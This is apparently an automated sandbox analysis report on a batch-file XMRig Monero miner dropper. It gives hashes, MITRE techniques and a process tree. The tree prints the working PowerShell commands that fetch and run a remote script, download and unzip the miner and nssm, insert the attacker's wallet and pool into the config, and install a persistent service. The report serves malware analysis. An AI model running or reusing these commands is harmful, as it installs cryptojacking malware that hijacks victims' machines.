xmrig | 4a084dd6b556a67848483a5763f8d3eebadc0527f804f102f7f944b23b31cb12

Analysis

max time kernel
1s
max time network
162s
platform
windows10-2004_x64
resource
win10v2004-20240508-en
resource tags

arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
submitted
01-07-2024 02:26

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

18917642329904.bat
Size

517B
MD5

ac9d73455d58bfa42f81e718b8c8d6b5
SHA1

60040fff333b7bc09b22e5c013f11b8a99555ed3
SHA256

4a084dd6b556a67848483a5763f8d3eebadc0527f804f102f7f944b23b31cb12
SHA512

ad24994554a8e6bb68f5ca80b1c53379f7a577964165f56d2f6bef14340fec3d0f17d14faa2db4651776a83bd5686f26ee59080ee2a16d0468b8d38504e460b2

Score

10^/10

xmrig evasion execution miner

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://rentry.co/regele/raw

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/xmrig.zip

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/nssm.zip

Signatures

XMRig Miner payload 3 IoCs
miner

Processes:

resource yara_rule

C:\Users\Admin\moneroocean\xmrig.exe family_xmrig
C:\Users\Admin\moneroocean\xmrig.exe xmrig
behavioral2/memory/1872-66-0x0000000000400000-0x000000000102B000-memory.dmp xmrig
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig
Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service
T1102

Processes:

flow ioc

18 raw.githubusercontent.com
19 raw.githubusercontent.com
29 raw.githubusercontent.com
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exe

pid process

3084 sc.exe
2548 sc.exe
2096 sc.exe
816 sc.exe

resource	yara_rule
C:\Users\Admin\moneroocean\xmrig.exe	family_xmrig
C:\Users\Admin\moneroocean\xmrig.exe	xmrig
behavioral2/memory/1872-66-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig

flow	ioc
18	raw.githubusercontent.com
19	raw.githubusercontent.com
29	raw.githubusercontent.com

pid	process
3084	sc.exe
2548	sc.exe
2096	sc.exe
816	sc.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 13 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
2188	powershell.exe
392	powershell.exe
2716	powershell.exe
4992	powershell.exe
3288	powershell.exe
2084	powershell.exe
4844	powershell.exe
4496	powershell.exe
1016	powershell.exe
1516	powershell.exe
232	powershell.exe
348	powershell.exe
4436	powershell.exe

Delays execution with timeout.exe 64 IoCs

evasion

Processes:

timeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exe

pid	process
3252	timeout.exe
1456	timeout.exe
2704	timeout.exe
2540	timeout.exe
2936	timeout.exe
232	timeout.exe
1592	timeout.exe
1052	timeout.exe
2992	timeout.exe
872	timeout.exe
3184	timeout.exe
1488	timeout.exe
4840	timeout.exe
1556	timeout.exe
432	timeout.exe
4724	timeout.exe
2288	timeout.exe
4780	timeout.exe
1584	timeout.exe
2448	timeout.exe
1248	timeout.exe
4056	timeout.exe
3676	timeout.exe
2616	timeout.exe
1968	timeout.exe
4976	timeout.exe
1748	timeout.exe
4780	timeout.exe
1224	timeout.exe
4876	timeout.exe
3800	timeout.exe
3252	timeout.exe
1592	timeout.exe
5088	timeout.exe
2252	timeout.exe
4868	timeout.exe
1516	timeout.exe
2016	timeout.exe
3680	timeout.exe
4992	timeout.exe
4000	timeout.exe
2276	timeout.exe
4456	timeout.exe
512	timeout.exe
3452	timeout.exe
3744	timeout.exe
4268	timeout.exe
4728	timeout.exe
1380	timeout.exe
2744	timeout.exe
5020	timeout.exe
4856	timeout.exe
2972	timeout.exe
4820	timeout.exe
1968	timeout.exe
2140	timeout.exe
2784	timeout.exe
3956	timeout.exe
2076	timeout.exe
3496	timeout.exe
4600	timeout.exe
3704	timeout.exe
1312	timeout.exe
3056	timeout.exe

Kills process with taskkill 1 IoCs
evasion

Processes:

taskkill.exe

pid process

1000 taskkill.exe
Runs net.exe
Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

powershell.exe

pid process

348 powershell.exe
348 powershell.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 348 powershell.exe
Suspicious use of WriteProcessMemory 2 IoCs

Processes:

cmd.exe

description pid process target process

PID 4892 wrote to memory of 348 4892 cmd.exe powershell.exe
PID 4892 wrote to memory of 348 4892 cmd.exe powershell.exe

pid	process
1000	taskkill.exe

pid	process
348	powershell.exe
348	powershell.exe

description	pid	process
Token: SeDebugPrivilege	348	powershell.exe

description	pid	process	target process
PID 4892 wrote to memory of 348	4892	cmd.exe	powershell.exe
PID 4892 wrote to memory of 348	4892	cmd.exe	powershell.exe

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\18917642329904.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:4892

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "$wc = New-Object System.Net.WebClient; $tempfile = [System.IO.Path]::GetTempFileName(); $tempfile += '.bat'; $wc.DownloadFile('https://rentry.co/regele/raw', $tempfile); & $tempfile 42cRnHwcKM6bmza8jmWyvWB2tjAcxQGmJ1QHhJ9ae55qRx488q6cvAU42EKkEiEd2N9TE1UjNViUSNVqV1NJ17R79fDhjVL; Remove-Item -Force $tempfile"
2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:348

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp4DD2.tmp.bat" 42cRnHwcKM6bmza8jmWyvWB2tjAcxQGmJ1QHhJ9ae55qRx488q6cvAU42EKkEiEd2N9TE1UjNViUSNVqV1NJ17R79fDhjVL"
3⤵
PID:2696

C:\Windows\system32\net.exe
net session
4⤵
PID:4604

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 session
5⤵
PID:60

C:\Windows\system32\where.exe
where powershell
4⤵
PID:5080

C:\Windows\system32\where.exe
where find
4⤵
PID:1220

C:\Windows\system32\where.exe
where findstr
4⤵
PID:2992

C:\Windows\system32\where.exe
where tasklist
4⤵
PID:1524

C:\Windows\system32\where.exe
where sc
4⤵
PID:3572

C:\Windows\system32\sc.exe
sc stop moneroocean_miner
4⤵
- Launches sc.exe
PID:2096

C:\Windows\system32\sc.exe
sc delete moneroocean_miner
4⤵
- Launches sc.exe
PID:2548

C:\Windows\system32\taskkill.exe
taskkill /f /t /im xmrig.exe
4⤵
- Kills process with taskkill
PID:1000

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "$wc = New-Object System.Net.WebClient; $wc.DownloadFile('https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/xmrig.zip', 'C:\Users\Admin\xmrig.zip')"
4⤵
- Command and Scripting Interpreter: PowerShell
PID:2084

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:\Users\Admin\xmrig.zip', 'C:\Users\Admin\moneroocean')"
4⤵
- Command and Scripting Interpreter: PowerShell
PID:392

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"donate-level\": *\d*,', '\"donate-level\": 1,'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
4⤵
- Command and Scripting Interpreter: PowerShell
PID:4496

C:\Users\Admin\moneroocean\xmrig.exe
"C:\Users\Admin\moneroocean\xmrig.exe" --help
4⤵
PID:1872

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -Command "hostname | %{$_ -replace '[^a-zA-Z0-9]+', '_'}"
4⤵
PID:3816

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "hostname | %{$_ -replace '[^a-zA-Z0-9]+', '_'}"
5⤵
- Command and Scripting Interpreter: PowerShell
PID:2716

C:\Windows\system32\HOSTNAME.EXE
"C:\Windows\system32\HOSTNAME.EXE"
6⤵
PID:5072

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"url\": *\".*\",', '\"url\": \"gulf.moneroocean.stream:10001\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
4⤵
- Command and Scripting Interpreter: PowerShell
PID:4436

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"user\": *\".*\",', '\"user\": \"42cRnHwcKM6bmza8jmWyvWB2tjAcxQGmJ1QHhJ9ae55qRx488q6cvAU42EKkEiEd2N9TE1UjNViUSNVqV1NJ17R79fDhjVL\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
4⤵
- Command and Scripting Interpreter: PowerShell
PID:1016

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"pass\": *\".*\",', '\"pass\": \"Objiyuie\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
4⤵
- Command and Scripting Interpreter: PowerShell
PID:4844

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"max-cpu-usage\": *\d*,', '\"max-cpu-usage\": 100,'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
4⤵
- Command and Scripting Interpreter: PowerShell
PID:1516

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"log-file\": *null,', '\"log-file\": \"C:\\Users\\Admin\\moneroocean\\xmrig.log\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
4⤵
- Command and Scripting Interpreter: PowerShell
PID:2188

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config_background.json' | %{$_ -replace '\"background\": *false,', '\"background\": true,'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config_background.json'"
4⤵
- Command and Scripting Interpreter: PowerShell
PID:232

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "$wc = New-Object System.Net.WebClient; $wc.DownloadFile('https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/nssm.zip', 'C:\Users\Admin\nssm.zip')"
4⤵
- Command and Scripting Interpreter: PowerShell
PID:4992

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:\Users\Admin\nssm.zip', 'C:\Users\Admin\moneroocean')"
4⤵
- Command and Scripting Interpreter: PowerShell
PID:3288

C:\Windows\system32\sc.exe
sc stop moneroocean_miner
4⤵
- Launches sc.exe
PID:816

C:\Windows\system32\sc.exe
sc delete moneroocean_miner
4⤵
- Launches sc.exe
PID:3084

C:\Users\Admin\moneroocean\nssm.exe
"C:\Users\Admin\moneroocean\nssm.exe" install moneroocean_miner "C:\Users\Admin\moneroocean\xmrig.exe"
4⤵
PID:2800

C:\Users\Admin\moneroocean\nssm.exe
"C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppDirectory "C:\Users\Admin\moneroocean"
4⤵
PID:3088

C:\Users\Admin\moneroocean\nssm.exe
"C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppPriority BELOW_NORMAL_PRIORITY_CLASS
4⤵
PID:1556

C:\Users\Admin\moneroocean\nssm.exe
"C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppStdout "C:\Users\Admin\moneroocean\stdout"
4⤵
PID:852

C:\Users\Admin\moneroocean\nssm.exe
"C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppStderr "C:\Users\Admin\moneroocean\stderr"
4⤵
PID:4068

C:\Users\Admin\moneroocean\nssm.exe
"C:\Users\Admin\moneroocean\nssm.exe" start moneroocean_miner
4⤵
PID:4488

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:1252

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:3844

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:1224

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:4876

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:1492

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:1968

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:3104

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:4552

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:3676

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:2016

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:1788

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:2616

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:2540

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:3472

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:2704

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:396

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:2724

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:4000

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:60

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:5080

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:4268

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:4024

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:3740

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:872

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:4944

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:4856

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:4840

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:380

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:2028

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:4728

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:392

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:5100

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:3956

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:4456

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:1072

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:1592

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:1412

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:2972

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:3252

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:2716

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:408

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:4056

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:208

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:1448

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:1380

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:3028

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:4052

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:2744

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:972

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:764

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
PID:4824

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:3032

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:3444

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:4876

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:4896

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:2076

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:4780

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:2008

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:2836

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:3800

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:3676

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:1916

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:2016

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:2616

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:1920

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:2540

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:2132

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:3392

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:5020

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:3456

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:1312

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:5088

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:60

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:232

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:1584

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:4024

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:2104

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:2448

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:4604

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:3656

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:4856

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:1108

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:2056

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:3452

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:3288

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:816

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:3184

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:4772

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:3956

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:1556

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:2796

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:1496

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:2972

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:3040

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:1220

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:432

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:2716

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:4612

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:4820

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:116

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:228

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:3744

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:2684

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:2192

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:1456

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:2280

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:4020

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:3704

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:1820

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:4876

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:2076

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:4004

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:4552

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:1968

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:4492

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:2124

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:2936

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:3676

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:3304

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:3496

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:3968

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:2400

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:2784

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:4420

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:2232

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:4976

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:464

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:5104

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:1312

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:5080

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:3572

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:232

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:3740

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:4324

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:3056

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:956

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:628

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:2276

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:1636

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:1560

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:1488

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:4840

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:5056

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:2252

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:1964

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:392

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:4456

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:1408

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:3764

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:1592

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:2932

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:2972

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:3252

